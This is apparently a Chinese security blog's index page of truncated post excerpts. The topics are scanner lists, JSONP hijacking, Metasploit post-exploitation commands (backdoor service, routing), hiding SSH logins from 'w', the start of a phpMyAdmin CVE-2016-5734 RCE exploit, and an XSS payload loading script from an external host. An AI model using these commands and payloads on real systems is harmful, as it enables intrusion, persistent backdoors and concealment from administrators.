安全行业从业人员自研开源扫描器合集
子域名枚举类
https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本)
https://github.com/ring04h/wydomain (子域名字典穷举)
https://github.c...
阅读全文
jsonp跨域劫持姿势
利用场景:
对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用.例如:http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1有callback参数未做校验,那么,可以用来...
阅读全文
msf 常用渗透模块----POST
创建服务作为后门meterpreter > run metsvc查看目标主机的内网IP段情况meterpreter > run get_local_subnets添加路由表和对应的sessionroute add 192.168.1.0 255.255.2...
阅读全文
linux隐身登录技巧
方法1:隐藏的远程登录(w 看不到)ssh -T user @ host
登录后执行:/bin/bash -i
然后就可以执行bash命令了,执行w看,登录是空的。方法2:隐藏的远程登录(w 看不到)ssh -o UserKnownHostsFile=/dev/null...
阅读全文
PhpMyAdmin 4.6.2后台命令执行Exp(cve-2016-5734)
cve-2016-5734利用EXP说明:登录PhpMyadmin后可以直接执行命令,提权。CODE:#!/usr/bin/env python"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE...
阅读全文
XSS Playload 集合
更新时间:2017年03月16日javascript:s=document.createElement('script');s.src='http://www.xxx.com/xss.js';document.body.appendChild(s) 更新时间:20...
阅读全文
互联网安全Blog Top30
1、We Live Security地址:http://www.welivesecurity.com/简介:主要研究网络威胁和恶意软件。文章更新频率:9篇/周2、Intel Security | McAfee Blogs地址:https://securingtomorrow...
阅读全文